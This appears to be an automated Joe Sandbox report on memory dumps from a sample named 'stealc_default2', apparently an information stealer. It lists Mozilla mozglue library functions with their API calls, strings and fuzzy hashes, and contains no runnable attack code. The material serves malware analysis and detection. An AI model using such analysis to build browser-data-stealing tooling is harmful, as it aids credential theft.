API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: ddd28c15f9ab8f5fdb016f8be7f02a76b32abc713fda61e481f6ae5ac096d465
Instruction ID: 69e67da0b87e93e913ba4166ceb1436938245ef88176ef8661594fd30bb78037
Opcode Fuzzy Hash: ddd28c15f9ab8f5fdb016f8be7f02a76b32abc713fda61e481f6ae5ac096d465
Instruction Fuzzy Hash: E061F1B1600301AFDF00EFA9D898B9A7BF5EB4A31DF11C129ED2593780DB34A944DB91

Function 6C0C3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E768,?,00003000,00000004), ref: 6C0C3AC5
LeaveCriticalSection.KERNEL32(6C14E768,?,00003000,00000004), ref: 6C0C3AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C0C3AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0C3B57
EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3B81
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3BA3
EnterCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3BAE
LeaveCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3C74
EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3C8B
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3C9F
LeaveCriticalSection.KERNEL32(6C14E7B8), ref: 6C0C3D5C
EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C3D67
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C3D8A

Part of subcall function 6C100D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0C3DEF), ref: 6C100D71
Part of subcall function 6C100D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0C3DEF), ref: 6C100D84

Strings

MOZ_CRASH(), xrefs: 6C0C3DB2
: (malloc) Error in VirtualFree(), xrefs: 6C0C3DCC
<jemalloc>, xrefs: 6C0C3DC7

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: cf109ad462b650bf10b9df4c696fb1a04600ff8bff5c0309ed1e6110b0efe801
Instruction ID: c37dea4452dde09bccfcb9f7070f70fd1df3dc3a05446646192d338f48922cf6
Opcode Fuzzy Hash: cf109ad462b650bf10b9df4c696fb1a04600ff8bff5c0309ed1e6110b0efe801
Instruction Fuzzy Hash: 8D91A0717106058BDB04DF68C4C4BAEB7F2BF89329F248528E9159BB81D771E901DBD2

Function 6C0D7FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C0D8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C0D801D

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C0D802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C0D803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C0D808D

Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C0D809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0D80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0D8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C0D8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C0D8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C0D817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D8199

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: 5ec639a72b2d22ae649d0ee22d37c51411f584f04fd329c8ef170c2fe492e071
Instruction ID: d9ef765a6d64af1f1d0848ccc62bb4b833226021ea332cf2ed8b3ce57baf226e
Opcode Fuzzy Hash: 5ec639a72b2d22ae649d0ee22d37c51411f584f04fd329c8ef170c2fe492e071
Instruction Fuzzy Hash: 315196B5E002145BDB00DBA9DC84BEFB7F9AF89668F150225E815E7741E730B9088BA1

Function 6C0D11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C0D1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0D1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0D12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C0D1327

Strings

Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C0D120D
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0D12AD
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C0D131B
&, xrefs: 6C0D126B
MZx, xrefs: 6C0D11E1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: d8eb0906f5541dcddca7aa75e6dea7b4e3d61ffca01d2488e551be0a27cc5cb1
Instruction ID: 362a1b3df28ca7157de48183fb19b85e583f52356ff9808528f1d43eae4e1c41
Opcode Fuzzy Hash: d8eb0906f5541dcddca7aa75e6dea7b4e3d61ffca01d2488e551be0a27cc5cb1
Instruction Fuzzy Hash: F271A171E057688ADB209FB4C804BDEB7F5BF4931DF05065AD449A3B40DB34BA89CB92

Function 6C0C31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0C3217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0C3236
FreeLibrary.KERNEL32 ref: 6C0C324B
__Init_thread_footer.LIBCMT ref: 6C0C3260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0C327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0C32D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0C32E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0C32F7

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

__aulldiv.LIBCMT ref: 6C0C346B

Strings

QueryInterruptTime, xrefs: 6C0C3230
KernelBase.dll, xrefs: 6C0C3212

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 19c88bd86552b6fbbbac5d99cd81764ae200abaf738f7596980fd580e2a12365
Instruction ID: a61bbd62950b30bd1cd672956fa84583eed71daed7edce50aaa42bf88f00f947
Opcode Fuzzy Hash: 19c88bd86552b6fbbbac5d99cd81764ae200abaf738f7596980fd580e2a12365
Instruction Fuzzy Hash: 9461E071A187018FC711DF38C45175AB3F5FFCA358F218B1DE8A9A3690EB34A54A8B42

Function 6C126660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126694
GetThreadId.KERNEL32(?), ref: 6C1266B1
GetCurrentThreadId.KERNEL32 ref: 6C1266B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C1266E1
EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126734
GetCurrentProcess.KERNEL32 ref: 6C12673A
LeaveCriticalSection.KERNEL32(6C14F618), ref: 6C12676C
GetCurrentThread.KERNEL32 ref: 6C1267FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C126868
RtlCaptureContext.NTDLL ref: 6C12687F

Strings

WalkStack64, xrefs: 6C126890

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 147ada337c11c644276b39606448c3e03f4b5b826ebae148dd1b15bb8c78c1d0
Instruction ID: 1d6ae511a052df7811aae23a53bd46b7707a8be3d1c8db952bd1e049597b8878
Opcode Fuzzy Hash: 147ada337c11c644276b39606448c3e03f4b5b826ebae148dd1b15bb8c78c1d0
Instruction Fuzzy Hash: C551CB75A09304AFDB11DF24C844B5EBBF4FF99718F00892DF99897680D778E9488B92

Function 6C10DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10DE73
GetCurrentThreadId.KERNEL32 ref: 6C10DF7D
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10DF8A
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10DFC9
GetCurrentThreadId.KERNEL32 ref: 6C10DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0D4A68), ref: 6C10DE7B

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0D4A68), ref: 6C10DEB8
free.MOZGLUE(00000000,?,6C0D4A68), ref: 6C10DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C10DF38

Strings

[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C10E00E
<none>, xrefs: 6C10DFD7
[I %d/%d] locked_profiler_stop, xrefs: 6C10DE83

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 2ed2f07f8ce1430c2f758492dad734db0361d21a798cb29f271fb279f5f4d7f1
Instruction ID: 97a1fab771f412d707956a854bcf666705db0d5e3dc84cb3fe1ecd0733ab3097
Opcode Fuzzy Hash: 2ed2f07f8ce1430c2f758492dad734db0361d21a798cb29f271fb279f5f4d7f1
Instruction Fuzzy Hash: 144104357016109BDB10BF64D818BAE7775EB8631CF58C069E92997B41CF34A807DBE2

Function 6C11D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D918
GetCurrentThreadId.KERNEL32 ref: 6C11D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D970
GetCurrentThreadId.KERNEL32 ref: 6C11D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C11DA2E
GetCurrentThreadId.KERNEL32 ref: 6C11DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C11DA91

Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11DAB7

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: 4ab3fafb3cb17ea109b17055f6ee1e5f797be458044364edb1d6eb844ee52fed
Instruction ID: 9968a58f1abd55691957026bf27fef60438fed2c9fc8d75ad19d9e9d7872f840
Opcode Fuzzy Hash: 4ab3fafb3cb17ea109b17055f6ee1e5f797be458044364edb1d6eb844ee52fed
Instruction Fuzzy Hash: 95719D756043049FCB00EF29C884B9EBBF5FF89318F15866DE85A9B741EB34A944CB91

Function 6C11D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D52A
GetCurrentThreadId.KERNEL32 ref: 6C11D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D55F
free.MOZGLUE(00000000), ref: 6C11D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C11D5D3
GetCurrentThreadId.KERNEL32 ref: 6C11D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D652
GetCurrentThreadId.KERNEL32 ref: 6C11D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D6A2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: c1f372f1e07392d657dcb0374a0160a09f0292c3a7b03c2b99c1cc0db77e7a26
Instruction ID: 2b8ea35cd0e412d92f0e8242b3017003f609b194ba2cceb3f3126b1a505ec4be
Opcode Fuzzy Hash: c1f372f1e07392d657dcb0374a0160a09f0292c3a7b03c2b99c1cc0db77e7a26
Instruction Fuzzy Hash: 27515BB1608B05DFC704EF35C484A9ABBF4FF89318F00862EE85A97B11DB34A945CB91

Function 6C0E5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C0E56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C0E56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C0E5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E57BC
GetTickCount64.KERNEL32 ref: 6C0E58CB
EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E58F3
__aulldiv.LIBCMT ref: 6C0E5945
LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C14F638,?,?,?,?), ref: 6C0E59E9

Strings

MOZ_APP_RESTART, xrefs: 6C0E56CC

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 78e84c0bb0d1fe49d0fd3c96e2429d03105a9c263ddeb461175b327151e29852
Instruction ID: e65223014f4311d5501bf07f8dd2a437da99687c06d20407784cccc3b6514718
Opcode Fuzzy Hash: 78e84c0bb0d1fe49d0fd3c96e2429d03105a9c263ddeb461175b327151e29852
Instruction Fuzzy Hash: 3FC18C75A093509FD705DF28C44066AFBF1BFCA718F058A1DE8D897760E730A886DB82

Function 6C10EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10EC8C

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

GetCurrentThreadId.KERNEL32 ref: 6C10ECA1
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C10ECC5
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C10ED19
CloseHandle.KERNEL32(?), ref: 6C10ED28
free.MOZGLUE(00000000), ref: 6C10ED2F
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C10EC94

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 1a91c98e8b3da63a4660d9d16d7a480ca99a421c3dff7e64ce33b9db87ea7b32
Instruction ID: b001678232bf7779c058c6216d05fe1fbe98f56743d1bf281d1c589392010671
Opcode Fuzzy Hash: 1a91c98e8b3da63a4660d9d16d7a480ca99a421c3dff7e64ce33b9db87ea7b32
Instruction Fuzzy Hash: C321E2B5700508ABDB00AF25D808BAA7779EF8636CF14C220FC2897781DF359906DBA1

Function 6C0D3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C0D3BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C0D3BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C0D3BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C0D3C91
ReleaseSRWLockShared.KERNEL32 ref: 6C0D3CBD
moz_xmalloc.MOZGLUE ref: 6C0D3CF1

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

